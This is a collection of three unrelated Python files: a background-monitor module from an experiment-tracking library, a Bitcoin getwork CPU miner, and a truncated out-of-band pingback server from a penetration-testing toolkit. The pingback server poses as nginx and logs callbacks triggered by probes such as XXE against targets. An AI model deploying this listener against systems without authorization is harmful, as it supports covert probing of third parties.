class SafeEvent(object):
    """Multiprocessing event wrapper; set() is skipped once the monitor subprocess is gone."""

    __thread_pool = SingletonThreadPool()

    def __init__(self):
        self._event = ProcessEvent()

    def is_set(self):
        return self._event.is_set()

    def set(self):
        # only signal while in thread mode, or while the monitor subprocess is alive
        if not BackgroundMonitor.is_subprocess_enabled() or BackgroundMonitor.is_subprocess_alive():
            self._event.set()

    def clear(self):
        return self._event.clear()

    def wait(self, timeout=None):
        return self._event.wait(timeout=timeout)
class SingletonLock(AbstractContextManager):
    """Registered multiprocessing lock; instantiate() materializes all registered locks at once."""

    _instances = []

    def __init__(self):
        # the underlying Lock is created lazily on first acquire/create
        self._lock = None
        SingletonLock._instances.append(self)

    def acquire(self, *args, **kwargs):
        self.create()
        return self._lock.acquire(*args, **kwargs)

    def release(self, *args, **kwargs):
        if self._lock is None:  # never created, nothing to release
            return None
        return self._lock.release(*args, **kwargs)

    def create(self):
        if self._lock is None:
            self._lock = Lock()

    @classmethod
    def instantiate(cls):
        # materialize the underlying Lock for every registered instance
        for inst in cls._instances:
            inst.create()

    def __enter__(self):
        """Acquire the lock and return `self`."""
        self.acquire()
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        """Release the lock; exceptions from the body propagate."""
        self.release()
class BackgroundMonitor(object):
    """Runs a periodic background step (`_daemon_step`) either in a daemon
    thread or in one shared monitoring subprocess per task."""

    # If we will need multiple monitoring contexts (i.e. subprocesses) this will become a dict
    _main_process = None            # pid of the monitoring subprocess (or our own pid inside it)
    _main_process_proc_obj = None   # psutil.Process for _main_process (None if lookup failed)
    _main_process_task_id = None
    _parent_pid = None
    _sub_process_started = None     # SafeEvent set once the subprocess is up
    _at_exit = False
    _instances = {}  # type: Dict[int, List[BackgroundMonitor]]

    def __init__(self, task, wait_period):
        self._event = ForkEvent()      # signals the daemon loop to stop
        self._done_ev = ForkEvent()    # set once the daemon loop has finished
        self._start_ev = ForkEvent()   # set once the daemon loop has started
        self._task_pid = os.getpid()
        # _thread lifecycle: None (not started) -> True (armed) -> Thread (running) -> False (stopped)
        self._thread = None
        self._thread_pid = None
        self._wait_timeout = wait_period
        # None means subprocess mode is possible (main task only); False forces thread mode
        self._subprocess = None if task.is_main_task() else False
        self._task_id = task.id
        self._task_obj_id = id(task.id)

    def start(self):
        if not self._thread:
            self._thread = True
        self._event.clear()
        self._done_ev.clear()
        if self._subprocess is False:
            # start the thread we are in threading mode.
            self._start()
        else:
            # append to instances
            if self not in self._get_instances():
                self._get_instances().append(self)

    def wait(self, timeout=None):
        # wait for the daemon to finish; meaningful only from the parent side
        if not self._done_ev:
            return
        if not self.is_subprocess_mode() or self.is_subprocess_mode_and_parent_process():
            self._done_ev.wait(timeout=timeout)

    def _start(self):
        # if we already started do nothing
        if isinstance(self._thread, Thread):
            if self._thread_pid == os.getpid():
                return
        self._thread_pid = os.getpid()
        self._thread = Thread(target=self._daemon)
        self._thread.daemon = True
        self._thread.start()

    def stop(self):
        if not self._thread:
            return

        if not self._is_subprocess_mode_and_not_parent_process() and (
                not self.is_subprocess_mode() or self.is_subprocess_alive()):
            self._event.set()

        if isinstance(self._thread, Thread):
            try:
                self._get_instances().remove(self)
            except ValueError:
                pass
            self._thread = False

    def daemon(self):
        # run one _daemon_step every _wait_timeout seconds until _event is set
        while True:
            if self._event.wait(self._wait_timeout):
                break
            self._daemon_step()

    def _daemon(self):
        self._start_ev.set()
        self.daemon()
        self.post_execution()
        self._thread = False

    def post_execution(self):
        self._done_ev.set()

    def set_subprocess_mode(self):
        # called just before launching the daemon in a subprocess
        if not self._subprocess:
            self._subprocess = True
        # events must cross the process boundary, so upgrade them to SafeEvent
        if not isinstance(self._done_ev, SafeEvent):
            self._done_ev = SafeEvent()
        if not isinstance(self._start_ev, SafeEvent):
            self._start_ev = SafeEvent()
        if not isinstance(self._event, SafeEvent):
            self._event = SafeEvent()

    def _daemon_step(self):
        # override point: one unit of periodic work
        pass

    @classmethod
    def start_all(cls, task, wait_for_subprocess=True):
        # noinspection PyProtectedMember
        execute_in_subprocess = task._report_subprocess_enabled

        if not execute_in_subprocess:
            for d in BackgroundMonitor._instances.get(id(task.id), []):
                d._start()
        elif not BackgroundMonitor._main_process:
            cls._parent_pid = os.getpid()
            cls._sub_process_started = SafeEvent()
            cls._sub_process_started.clear()
            cls._main_process_task_id = task.id
            # setup
            for d in BackgroundMonitor._instances.get(id(task.id), []):
                d.set_subprocess_mode()

            # todo: solve for standalone spawn subprocess
            if ForkContext is not None and isinstance(get_context(), ForkContext):
                cls.__start_subprocess_forkprocess(task_obj_id=id(task.id))
            else:
                cls.__start_subprocess_os_fork(task_obj_id=id(task.id))

            # wait until subprocess is up
            if wait_for_subprocess:
                cls._sub_process_started.wait()

    @classmethod
    def __start_subprocess_os_fork(cls, task_obj_id):
        process_args = (task_obj_id, cls._sub_process_started, os.getpid())
        BackgroundMonitor._main_process = os.fork()
        # check if we are the child process
        if BackgroundMonitor._main_process == 0:
            # update to the child process pid
            BackgroundMonitor._main_process = os.getpid()
            BackgroundMonitor._main_process_proc_obj = psutil.Process(BackgroundMonitor._main_process)
            cls._background_process_start(*process_args)
            # force to leave the subprocess
            leave_process(0)
            return

        # update main process object (we are now in the parent process, and we update on the child's subprocess pid)
        # noinspection PyBroadException
        try:
            BackgroundMonitor._main_process_proc_obj = psutil.Process(BackgroundMonitor._main_process)
        except Exception:
            # if we fail for some reason, do not crash, switch to thread mode when you can
            BackgroundMonitor._main_process_proc_obj = None

    @classmethod
    def __start_subprocess_forkprocess(cls, task_obj_id):
        _main_process = Process(
            target=cls._background_process_start,
            args=(task_obj_id, cls._sub_process_started, os.getpid())
        )
        _main_process.daemon = True
        # Hack allow to create daemon subprocesses (even though python doesn't like it)
        un_daemonize = False
        # noinspection PyBroadException
        try:
            from multiprocessing import current_process
            if current_process()._config.get('daemon'):  # noqa
                un_daemonize = current_process()._config.get('daemon')  # noqa
                current_process()._config['daemon'] = False  # noqa
        except BaseException:
            pass
        # try to start the background process, if we fail retry again, or crash
        for i in range(4):
            try:
                _main_process.start()
                break
            except BaseException:
                if i < 3:
                    sleep(1)
                    continue
                raise
        BackgroundMonitor._main_process = _main_process.pid
        BackgroundMonitor._main_process_proc_obj = psutil.Process(BackgroundMonitor._main_process)
        if un_daemonize:
            # restore the daemon flag we temporarily cleared above
            # noinspection PyBroadException
            try:
                from multiprocessing import current_process
                current_process()._config['daemon'] = un_daemonize  # noqa
            except BaseException:
                pass

    @classmethod
    def _background_process_start(cls, task_obj_id, event_start=None, parent_pid=None):
        # type: (int, Optional[SafeEvent], Optional[int]) -> None
        # Entry point of the monitoring subprocess: start all registered
        # instances and stay alive until their threads exit or the parent dies.
        is_debugger_running = bool(getattr(sys, 'gettrace', None) and sys.gettrace())
        # make sure we update the pid to our own
        cls._main_process = os.getpid()
        cls._main_process_proc_obj = psutil.Process(cls._main_process)
        # restore original signal, this will prevent any deadlocks
        # Do not change the exception we need to catch base exception as well
        # noinspection PyBroadException
        try:
            from ... import Task
            # make sure we do not call Task.current_task() it will create a Task object for us on a subprocess!
            # noinspection PyProtectedMember
            if Task._has_current_task_obj():
                # noinspection PyProtectedMember
                Task.current_task()._remove_at_exit_callbacks()
        except:  # noqa
            pass

        # if a debugger is running, wait for it to attach to the subprocess
        if is_debugger_running:
            sleep(3)

        instances = BackgroundMonitor._instances.get(task_obj_id, [])
        # launch all the threads
        for d in instances:
            d._start()
        if cls._sub_process_started:
            cls._sub_process_started.set()
        if event_start:
            event_start.set()
        # wait until we are signaled
        for i in instances:
            # DO NOT CHANGE, we need to catch base exception, if the process gets killed
            try:
                while i._thread is None or (i._thread and i._thread.is_alive()):
                    # thread is still not up
                    if i._thread is None:
                        sleep(0.1)
                        continue
                    # noinspection PyBroadException
                    try:
                        p = psutil.Process(parent_pid)
                        parent_alive = p.is_running() and p.status() != psutil.STATUS_ZOMBIE
                    except Exception:
                        parent_alive = False
                    # if parent process is not here we should just leave!
                    if not parent_alive:
                        return
                    # DO NOT CHANGE, we need to catch base exception, if the process gets killed
                    try:
                        # timeout so we can detect if the parent process got killed.
                        i._thread.join(timeout=30.)
                    except:  # noqa
                        break
            except:  # noqa
                pass
        # we are done, leave process
        return

    def is_alive(self):
        if not self.is_subprocess_mode():
            return isinstance(self._thread, Thread) and self._thread.is_alive()

        if self.get_at_exit_state():
            return self.is_subprocess_alive() and self._thread

        return self.is_subprocess_alive() and \
            self._thread and \
            self._start_ev.is_set() and \
            not self._done_ev.is_set()

    @classmethod
    def _fast_is_subprocess_alive(cls):
        if not cls._main_process_proc_obj:
            return False
        # we have to assume the process actually exists, so we optimize for
        # just getting the object and status.
        # noinspection PyBroadException
        try:
            return cls._main_process_proc_obj.is_running() and \
                cls._main_process_proc_obj.status() != psutil.STATUS_ZOMBIE
        except Exception:
            return False

    @classmethod
    def is_subprocess_alive(cls, task=None):
        if not cls._main_process or (task and cls._main_process_task_id != task.id):
            return False
        # noinspection PyBroadException
        try:
            p = psutil.Process(cls._main_process)
            return p.is_running() and p.status() != psutil.STATUS_ZOMBIE
        except Exception:
            # fall back to scanning the parent's children
            current_pid = cls._main_process
            if not current_pid:
                return False
            try:
                parent = psutil.Process(cls._parent_pid)
            except psutil.Error:
                # could not find parent process id
                # NOTE: implicit None return here (falsy, unlike the explicit False elsewhere)
                return
            for child in parent.children(recursive=True):
                # kill ourselves last (if we need to)
                if child.pid == current_pid:
                    return child.is_running() and child.status() != psutil.STATUS_ZOMBIE
            return False

    def is_subprocess_mode(self):
        return self._subprocess is not False and \
            bool(self._main_process) and self._task_id == self._main_process_task_id

    def _get_instances(self):
        # registry of monitors belonging to this task object
        return self._instances.setdefault(self._task_obj_id, [])

    def _is_subprocess_mode_and_not_parent_process(self):
        return self.is_subprocess_mode() and self._parent_pid != os.getpid()

    def is_subprocess_mode_and_parent_process(self):
        return self.is_subprocess_mode() and self._parent_pid == os.getpid()

    def _is_thread_mode_and_not_main_process(self):
        if self.is_subprocess_mode():
            return False
        from ... import Task
        # noinspection PyProtectedMember
        return Task._Task__is_subprocess()

    @classmethod
    def is_subprocess_enabled(cls, task=None):
        return bool(cls._main_process) and (not task or task.id == cls._main_process_task_id)

    @classmethod
    def clear_main_process(cls, task):
        # full reset of the subprocess bookkeeping (waits for the subprocess first)
        if BackgroundMonitor._main_process_task_id != task.id:
            return
        cls.wait_for_sub_process(task)
        BackgroundMonitor._main_process = None
        BackgroundMonitor._main_process_proc_obj = None
        BackgroundMonitor._main_process_task_id = None
        BackgroundMonitor._parent_pid = None
        BackgroundMonitor._sub_process_started = None
        BackgroundMonitor._instances = {}
        SingletonThreadPool.clear()

    @classmethod
    def wait_for_sub_process(cls, task, timeout=None):
        if not cls.is_subprocess_enabled(task=task):
            return
        for d in BackgroundMonitor._instances.get(id(task.id), []):
            d.stop()
        tic = time()
        while cls.is_subprocess_alive(task=task) and (not timeout or time()-tic < timeout):
            sleep(0.03)

    @classmethod
    def set_at_exit_state(cls, state=True):
        cls._at_exit = bool(state)

    @classmethod
    def get_at_exit_state(cls):
        return cls._at_exit
def leave_process(status=0):
    # type: (int) -> None
    """Terminate the current process with exit code ``status``.

    :param status: int exit code
    """
    code = status or 0
    try:
        sys.exit(code)
    except:  # noqa
        # ipython/jupyter notebook will not allow to call sys.exit
        # we have to call the low level function
        os._exit(code)  # noqa
|
pyminer.py | #!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15           # seconds to back off after an RPC error
MAX_NONCE = 1000000L     # initial nonce scan range per work unit (retuned by Miner.iterate)
settings = {}            # populated from the CONFIG-FILE at startup
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
    """Minimal JSON-RPC 1.1 client for a bitcoind node over HTTP basic auth (Python 2)."""
    OBJID = 1

    def __init__(self, host, port, username, password):
        authpair = "%s:%s" % (username, password)
        self.authhdr = "Basic %s" % (base64.b64encode(authpair))
        self.conn = httplib.HTTPConnection(host, port, False, 30)

    def rpc(self, method, params=None):
        # Issue one JSON-RPC call. Returns the 'result' member on success,
        # the 'error' object on an RPC-level error, or None on transport/decode failure.
        self.OBJID += 1
        obj = { 'version' : '1.1',
            'method' : method,
            'id' : self.OBJID }
        if params is None:
            obj['params'] = []
        else:
            obj['params'] = params
        self.conn.request('POST', '/', json.dumps(obj),
            { 'Authorization' : self.authhdr,
              'Content-type' : 'application/json' })

        resp = self.conn.getresponse()
        if resp is None:
            print "JSON-RPC: no response"
            return None

        body = resp.read()
        resp_obj = json.loads(body)
        if resp_obj is None:
            print "JSON-RPC: cannot JSON-decode body"
            return None
        if 'error' in resp_obj and resp_obj['error'] != None:
            return resp_obj['error']
        if 'result' not in resp_obj:
            print "JSON-RPC: no result in object"
            return None

        return resp_obj['result']

    def getblockcount(self):
        return self.rpc('getblockcount')

    def getwork(self, data=None):
        return self.rpc('getwork', data)
def uint32(x):
    """Truncate x to an unsigned 32-bit value."""
    return x & 0xffffffffL
def bytereverse(x):
    """Reverse the byte order of a 32-bit word (endianness swap)."""
    return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
        (((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
    """Byte-swap each 32-bit word of a binary buffer (length must be a multiple of 4)."""
    out_words = []
    for i in range(0, len(in_buf), 4):
        word = struct.unpack('@I', in_buf[i:i+4])[0]
        out_words.append(struct.pack('@I', bytereverse(word)))
    return ''.join(out_words)
def wordreverse(in_buf):
    """Reverse the order of the 32-bit words in a binary buffer (bytes within words unchanged)."""
    out_words = []
    for i in range(0, len(in_buf), 4):
        out_words.append(in_buf[i:i+4])
    out_words.reverse()
    return ''.join(out_words)
class Miner:
    """Brute-force double-SHA256 scanner over the nonce field of a getwork block header."""

    def __init__(self, id):
        self.id = id
        self.max_nonce = MAX_NONCE

    def work(self, datastr, targetstr):
        """Scan nonces for one work unit; return (hashes_done, nonce_bin or None)."""
        # decode work data hex string to binary
        static_data = datastr.decode('hex')
        static_data = bufreverse(static_data)

        # the first 76b of 80b do not change
        blk_hdr = static_data[:76]

        # decode 256-bit target value
        targetbin = targetstr.decode('hex')
        targetbin = targetbin[::-1]  # byte-swap and dword-swap
        targetbin_str = targetbin.encode('hex')
        target = long(targetbin_str, 16)

        # pre-hash first 76b of block header
        static_hash = hashlib.sha256()
        static_hash.update(blk_hdr)

        for nonce in xrange(self.max_nonce):
            # encode 32-bit nonce value
            nonce_bin = struct.pack("<I", nonce)

            # hash final 4b, the nonce value
            hash1_o = static_hash.copy()
            hash1_o.update(nonce_bin)
            hash1 = hash1_o.digest()

            # sha256 hash of sha256 hash
            hash_o = hashlib.sha256()
            hash_o.update(hash1)
            hash = hash_o.digest()

            # quick test for winning solution: high 32 bits zero?
            if hash[-4:] != '\0\0\0\0':
                continue

            # convert binary hash to 256-bit Python long
            hash = bufreverse(hash)
            hash = wordreverse(hash)
            hash_str = hash.encode('hex')
            l = long(hash_str, 16)

            # proof-of-work test: hash < target
            if l < target:
                print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
                return (nonce + 1, nonce_bin)
            else:
                print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
                # return (nonce + 1, nonce_bin)

        return (nonce + 1, None)

    def submit_work(self, rpc, original_data, nonce_bin):
        """Splice the winning nonce into the original work data and resubmit via getwork."""
        nonce_bin = bufreverse(nonce_bin)
        nonce = nonce_bin.encode('hex')
        # the nonce occupies hex chars [152:160) of the 256-char data field
        solution = original_data[:152] + nonce + original_data[160:256]
        param_arr = [ solution ]
        result = rpc.getwork(param_arr)
        print time.asctime(), "--> Upstream RPC result:", result

    def iterate(self, rpc):
        """One round: fetch work, scan nonces, retune max_nonce, submit any solution."""
        work = rpc.getwork()
        if work is None:
            time.sleep(ERR_SLEEP)
            return
        if 'data' not in work or 'target' not in work:
            time.sleep(ERR_SLEEP)
            return

        time_start = time.time()

        (hashes_done, nonce_bin) = self.work(work['data'],
            work['target'])

        time_end = time.time()
        time_diff = time_end - time_start

        # scale max_nonce so that one scan takes ~settings['scantime'] seconds
        self.max_nonce = long(
            (hashes_done * settings['scantime']) / time_diff)
        if self.max_nonce > 0xfffffffaL:
            self.max_nonce = 0xfffffffaL

        if settings['hashmeter']:
            print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
                self.id, hashes_done,
                (hashes_done / 1000.0) / time_diff)

        if nonce_bin is not None:
            self.submit_work(rpc, work['data'], nonce_bin)

    def loop(self):
        """Mine forever against the configured RPC endpoint."""
        rpc = BitcoinRPC(settings['host'], settings['port'],
            settings['rpcuser'], settings['rpcpass'])
        if rpc is None:
            return

        while True:
            self.iterate(rpc)
def miner_thread(id):
    """Worker entry point: run one Miner loop forever (one per spawned process)."""
    Miner(id).loop()
if __name__ == '__main__':
    if len(sys.argv) != 2:
        print "Usage: pyminer.py CONFIG-FILE"
        sys.exit(1)

    # parse the key=value configuration file, skipping comment lines
    f = open(sys.argv[1])
    for line in f:
        # skip comment lines
        m = re.search('^\s*#', line)
        if m:
            continue

        # parse key=value lines
        m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
        if m is None:
            continue
        settings[m.group(1)] = m.group(2)
    f.close()

    # fill in defaults for optional settings
    if 'host' not in settings:
        settings['host'] = '127.0.0.1'
    if 'port' not in settings:
        settings['port'] = 2017
    if 'threads' not in settings:
        settings['threads'] = 1
    if 'hashmeter' not in settings:
        settings['hashmeter'] = 0
    if 'scantime' not in settings:
        settings['scantime'] = 30L
    if 'rpcuser' not in settings or 'rpcpass' not in settings:
        print "Missing username and/or password in cfg file"
        sys.exit(1)

    # normalize numeric settings (config values arrive as strings)
    settings['port'] = int(settings['port'])
    settings['threads'] = int(settings['threads'])
    settings['hashmeter'] = int(settings['hashmeter'])
    settings['scantime'] = long(settings['scantime'])

    # spawn one miner process per configured thread
    thr_list = []
    for thr_id in range(settings['threads']):
        p = Process(target=miner_thread, args=(thr_id,))
        p.start()
        thr_list.append(p)
        time.sleep(1)  # stagger threads

    print settings['threads'], "mining threads started"

    print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
    try:
        for thr_proc in thr_list:
            thr_proc.join()
    except KeyboardInterrupt:
        pass
    print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
py-collaborator-server.py | #!/usr/bin/python3
from http.server import BaseHTTPRequestHandler,HTTPServer
import urllib
import re
import sys
import ssl
import json
import string
import random
import socket
import pymysql
import argparse
import datetime
import threading
from Database import Database
from Logger import *
VERSION = '0.1'

#
# CONFIGURE THE BELOW VARIABLES
#

# Must point to JSON file containing configuration mentioned in `config` dictionary below.
# One can either supply that configuration file, or let the below variable empty and fill the `config`
# dictionary instead.
CONFIGURATION_FILE = 'config.json'

config = {
    'debug' : '',
    'listen' : '0.0.0.0',
    'pingback-host': '',
    'server-remote-addr': '',
    'listen-on-ports' : (80, 443, 8080),

    # You can generate it using Let's Encrypt wildcard certificate.
    'server-ca-cert' : '',
    "server-key-file": '',

    'mysql-host': '',
    'mysql-user': '',
    'mysql-pass': '',
    'mysql-database': '',

    'exclude-pingbacks-from-clients' : [],
}

# NOTE(review): request handlers below call databaseInstance.query()/insert(),
# so this must be set to a Database instance before serving — init code not in view.
databaseInstance = None
def generateRandomId():
    """Return a 56-char correlation id: 'xxx' + 50 random [a-z0-9] chars + 'yyy'."""
    alphabet = string.ascii_lowercase + string.digits
    core = ''.join(random.choice(alphabet) for _ in range(50))
    return 'xxx' + core + 'yyy'
class PingbackServer(BaseHTTPRequestHandler):
    """HTTP(S) handler that correlates incoming out-of-band pingbacks.

    Every request (any HTTP method) is scanned for a previously issued
    tracking token of the form ``xxx<50 lowercase alnum>yyy`` — either in
    the URL path or in any request header. A hit is matched against the
    ``requests`` table and recorded in ``calledbacks``.
    """

    method = ''  # last seen HTTP method; used only for debug logging

    def __init__(self, *args, **kwargs):
        # Masquerade as nginx to make fingerprinting the pingback server harder.
        self.server_version = 'nginx'
        try:
            BaseHTTPRequestHandler.__init__(self, *args, **kwargs)
        except Exception as e:
            if config['debug']:
                Logger.dbg('Failure along __init__ of BaseHTTPRequestHandler: {}'.format(str(e)))
            raise
        #Logger.info('Previously catched pingbacks:\n--------------------------\n')
        #self.presentAtStart()

    def presentAtStart(self):
        """Log pingbacks recorded in previous runs (currently unused; see __init__)."""
        rows = databaseInstance.query(f'SELECT * FROM calledbacks')
        if not rows:
            return
        for row in rows:
            # NOTE(review): the fetched originating request is unused; only the
            # stored pingback text is logged — confirm intended.
            request = databaseInstance.query(f"SELECT * FROM requests WHERE id = {row['requestid']}")
            Logger.info(row['request'])

    def log_message(self, format, *args):
        # Silence the default per-request stderr logging.
        return

    def extractUuid(self):
        """Search the URL path and headers for a tracking token.

        Returns a (where, uuid) tuple; both are empty strings on no match.
        """
        uuidRex = re.compile(r'(\bxxx[a-z0-9]{50}yyy\b)', re.I|re.M)
        if 'xxx' in self.path and 'yyy' in self.path:
            # Request path
            m = uuidRex.search(self.path)
            if m:
                return ('URL path', m.group(1))
        # Request headers
        for h in self.headers:
            value = self.headers[h]
            # Cheap substring pre-check before running the regex.
            if ('xxx' not in value or 'yyy' not in value):
                continue
            m = uuidRex.search(value)
            if m:
                return (f'Header: {h}', m.group(1))
        return ('', '')

    def presentPingbackedRequest(self, where, uuid, record):
        """Format and log a human-readable report for a matched pingback."""
        fmt = '%Y-%m-%d %H:%M:%S'
        now = datetime.datetime.utcnow().strftime(fmt)
        delay = str(datetime.datetime.utcnow() - datetime.datetime.strptime(record['sent'], fmt))
        req = '\r\n'.join([f'\t{x}' for x in record['request'].split('\r\n')])
        req2 = '\r\n'.join([f'\t{x}' for x in PingbackServer.requestToString(self).split('\r\n')])
        try:
            reverse = socket.gethostbyaddr(self.client_address[0])[0]
        except:
            # No PTR record — fall back to the raw client IP.
            reverse = self.client_address[0]
        message = f'''
-------------------------------------------------------------------------------------
Issue: Pingback {record['id']} ({self.command} {self.path} ) found in request's {where}
Where payload was put: {record['whereput']}
Contacting host: {reverse}
Tried to reach vhost: {self.headers['Host']}:{self.server.server_port}
Issue detail:
Our pingback-server was contacted by ({self.client_address[0]}:{self.client_address[1]}) after a delay of ({delay}):
Original request where this pingback was inserted:
---
{req}
Request that was sent to us in return:
---
{req2}
The payload was sent at ({record['sent']}) and received on ({now}).
-------------------------------------------------------------------------------------
'''
        Logger._out(message)
        return message

    def savePingback(self, requestid, message):
        """Persist a received pingback into the calledbacks table.

        BUG FIX: the original INSERT listed four columns
        (id, requestid, uuid, whereput) but supplied only three values,
        and the column list did not match the calledbacks schema
        (id, requestid, request) created in initDatabase() — every
        insert failed. Columns now match the schema.
        """
        query = 'INSERT INTO calledbacks(id, requestid, request) VALUES(%d, %d, "%s")' % (\
            0, requestid, message)
        Logger.dbg(f'Saving pingback: (requestid={str(requestid)})')
        Logger.dbg(query)
        databaseInstance.insert(query)

    def checkUuid(self, where, uuid):
        """Validate a candidate token and, if known, log + store the pingback."""
        if not (uuid.startswith('xxx') and uuid.endswith('yyy')):
            return
        # Reject any character outside [a-z0-9] before the token reaches SQL.
        for a in uuid:
            if a not in string.ascii_lowercase + string.digits:
                return
        out = databaseInstance.query(f'SELECT * FROM requests WHERE uuid = "{uuid}"')
        if out:
            message = self.presentPingbackedRequest(where, uuid, out[0])
            self.savePingback(out[0]['id'], message)

    def send_header(self, name, value):
        # Always report the Server banner as nginx, whatever the caller asked for.
        if name == 'Server':
            return super(PingbackServer, self).send_header(name, 'nginx')
        return super(PingbackServer, self).send_header(name, value)

    def _set_response(self):
        """Send a bland 200 OK header block."""
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    @staticmethod
    def requestToString(request):
        """Render a handler's request line and headers as raw HTTP text."""
        headers = '\r\n'.join(['{}: {}'.format(k, v) for k, v in request.headers.items()])
        out = '{} {} {}\r\n{}'.format(request.command, request.path, request.request_version, headers)
        return out

    def do_GET(self):
        """Handle any request: scan for a token unless the client is excluded."""
        if not (self.client_address[0] in config['exclude-pingbacks-from-clients']):
            if config['debug']:
                Logger.dbg('--------------------------\nIncoming HTTP request from {}: {} {}'.format(
                    self.client_address[0],
                    self.method,
                    self.path[:25]
                ))
                Logger.dbg(PingbackServer.requestToString(self) + '\n')
            (where, uuid) = PingbackServer.extractUuid(self)
            if uuid:
                self.checkUuid(where, uuid)
        else:
            Logger.dbg('Skipping Client ({}) as it was excluded in config file.'.format(self.client_address[0]))
        self._set_response()
        self.wfile.write(b'Ok')

    # Every HTTP method is treated identically — a pingback can arrive any way.
    do_POST = do_GET
    do_DELETE = do_GET
    do_PUT = do_GET
    do_OPTIONS = do_GET
    do_HEAD = do_GET
    do_TRACE = do_GET
    do_CONNECT = do_GET
    do_PATCH = do_GET
def parseOptions(argv):
    """Parse command-line options and fold them into the global `config` dict.

    Returns the argparse namespace (callers treat a falsy return as failure).
    Exits the process on an out-of-range port.
    """
    global config
    print('''
    :: Cracking the Lens pingback responding server
    Responds to every Out-of-band request correlating them along the way
    Mariusz Banach / mgeeky '16-18, <mb@binary-offensive.com>
''')
    parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options]')
    parser.add_argument('-l', '--listen', default='0.0.0.0', help = 'Specifies interface address to bind the HTTP server on / listen on. Default: 0.0.0.0 (all interfaces)')
    parser.add_argument('-p', '--port', metavar='PORT', default='80', type=int, help='Specifies the port to listen on. Default: 80')
    parser.add_argument('-r', '--rhost', metavar='HOST', default=config['server-remote-addr'], help='Specifies attackers host address where the victim\'s XML parser should refer while fetching external entities')
    parser.add_argument('--mysql-host', metavar='MYSQLHOST', default='127.0.0.1', type=str, help='Specifies the MySQL hostname. Defalut: 127.0.0.1:3306')
    parser.add_argument('--mysql-user', metavar='MYSQLUSER', default='root', type=str, help='Specifies the MySQL user, that will be able to create database, tables, select/insert records and so on. Default: root')
    parser.add_argument('--mysql-pass', metavar='MYSQLPASS', type=str, help='Specifies the MySQL password')
    parser.add_argument('-d', '--debug', action='store_true', help='Display debug output.')
    args = parser.parse_args()
    config['debug'] = args.debug
    config['listen'] = args.listen
    config['port'] = int(args.port)
    config['server-remote-addr'] = args.rhost
    port = int(args.port)
    if port < 1 or port > 65535:
        Logger.err("Invalid port number. Must be in <1, 65535>")
        sys.exit(-1)
    # BUG FIX: the original checked `args.mysql_port`, which is never defined
    # as an option; the resulting AttributeError was swallowed by a bare
    # `except`, so the MySQL CLI options were silently ignored. The check now
    # covers only the options that actually exist, and the blanket
    # try/except that hid the defect is gone.
    if not args.mysql_host or not args.mysql_user or not args.mysql_pass:
        Logger.warn("You shall specify all needed MySQL connection data either via program options or config file.")
        #sys.exit(-1)
    else:
        config['mysql-host'] = args.mysql_host
        config['mysql-user'] = args.mysql_user
        config['mysql-pass'] = args.mysql_pass
    return args
def connectToDatabase():
    """Create the module-wide Database handle and open the MySQL connection.

    Returns whatever Database.connection() returns (truthy on success,
    judging by the check in main()).
    """
    global databaseInstance
    databaseInstance = Database()
    return databaseInstance.connection(config['mysql-host'], config['mysql-user'], config['mysql-pass'])
def initDatabase():
    """Create the application's database and tables (idempotent), then select the DB.

    requests:    one row per outgoing probe carrying a tracking uuid.
    calledbacks: one row per pingback received for a known request.
    """
    initQueries = (
        f"CREATE DATABASE IF NOT EXISTS {config['mysql-database']}",
        f'''CREATE TABLE IF NOT EXISTS {config['mysql-database']}.requests (
id integer AUTO_INCREMENT,
sent text NOT NULL,
uuid text NOT NULL,
desthost text NOT NULL,
pingback text NOT NULL,
whereput text NOT NULL,
request text NOT NULL,
PRIMARY KEY (id)) ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;''',
        f'''CREATE TABLE IF NOT EXISTS {config['mysql-database']}.calledbacks (
id integer AUTO_INCREMENT,
requestid integer NOT NULL,
request text NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY(requestid) REFERENCES requests(id)) ENGINE=MyISAM AUTO_INCREMENT=1 DEFAULT CHARSET=utf8;''',
    )
    for query in initQueries:
        databaseInstance.query(query)
    # Make subsequent unqualified queries hit the application's database.
    databaseInstance.databaseConnection.select_db(config['mysql-database'])
    Logger.ok('Database initialized.')
def fetchRhost():
    """Default `server-remote-addr` to this host's resolved IP address.

    NOTE(review): gethostbyname(gethostname()) may yield 127.0.x.x depending
    on /etc/hosts; -r/--rhost exists to override it.
    """
    global config
    config['server-remote-addr'] = socket.gethostbyname(socket.gethostname())
def main(argv):
    """Entry point: parse options, connect to MySQL, serve on all configured ports.

    Each port gets its own HTTPServer on a daemon thread; port 443 is wrapped
    in TLS. The main thread then idles until Ctrl+C.
    """
    import time  # local import: only needed for the idle loop below
    global config
    fetchRhost()
    opts = parseOptions(argv)
    if not opts:
        Logger.err('Options parsing failed.')
        return False
    # File-based configuration overrides built-in defaults and CLI results.
    if CONFIGURATION_FILE:
        config.update(json.loads(open(CONFIGURATION_FILE).read()))
    if not connectToDatabase():
        Logger.err('Could not connect to database: {}'.format(config['mysql-host']))
        sys.exit(-1)
    initDatabase()
    Logger.dbg('Local host\'s IP address (RHOST) set to: {}'.format(config['server-remote-addr']))
    for port in config['listen-on-ports']:
        try:
            server = HTTPServer((config['listen'], port), PingbackServer)
            server.server_version = 'nginx'
        except OSError as e:
            # BUG FIX: message typo — was "Could not server on port".
            Logger.err(f'Could not serve on port {port}: {str(e)}')
            Logger.warn('Skipping...')
            continue
            #return
        if port == 443:
            try:
                server.socket = ssl.wrap_socket(server.socket, keyfile = config['server-key-file'], certfile = config['server-ca-cert'], server_side = True)
